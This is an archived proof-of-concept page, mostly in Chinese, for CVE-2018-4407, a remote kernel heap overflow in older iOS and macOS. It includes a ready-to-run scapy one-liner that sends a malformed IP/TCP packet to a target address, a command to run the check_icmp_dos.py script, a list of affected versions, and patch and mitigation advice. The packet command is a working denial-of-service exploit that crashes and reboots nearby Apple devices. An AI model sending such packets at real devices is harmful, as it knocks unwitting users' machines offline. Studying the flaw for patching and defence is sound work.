Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

Source
Associated Vulnerability
Title:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:Apple macOS High Sierra等都是美国苹果(Apple)公司的一套专为Mac计算机所开发的专用操作系统。 Apple macOS Sierra 10.12.6版本和macOS High Sierra 10.13.6版本中的Kernel组件存在安全漏洞。攻击者可利用该漏洞执行任意代码(内存损坏)。
Description
iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC
Readme
# check_icmp_dos

***iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC:***
```
pip install scapy
sudo scapy 
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

```

或使用脚本

```
python check_icmp_dos.py 127.0.0.1
```

该漏洞使得攻击者只要接入同一Wi-Fi网络,即可向其他毫不知情的用户发送恶意数据包来触发任何Mac或iOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。

运行以下操作系统的设备易受攻击:
```
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

```



# 修复建议

目前,苹果官方已经发布了ios12.1版本更新修复了该漏洞,建议用户及时确认系统版本,如受影响,请及时采取修补措施。漏洞修补措施如下:
1. 进行系统更新,更新到最新版本
2. 如果没有更新到最新版本,可在macOS防火墙中启用隐藏模式可防止攻击,这个系统设置默认情况下不启用,需要用户手动开启。
3. 不接入公共无线网络。触发该漏洞的唯一必要条件是处于同一网络,该漏洞不支持通过互联网发送恶意数据包而触发
File Snapshot

[4.0K] /data/pocs/949d5a7b11425e5d71840388ea8a916a0b45e248 ├── [ 746] check_icmp_dos.py └── [1.6K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.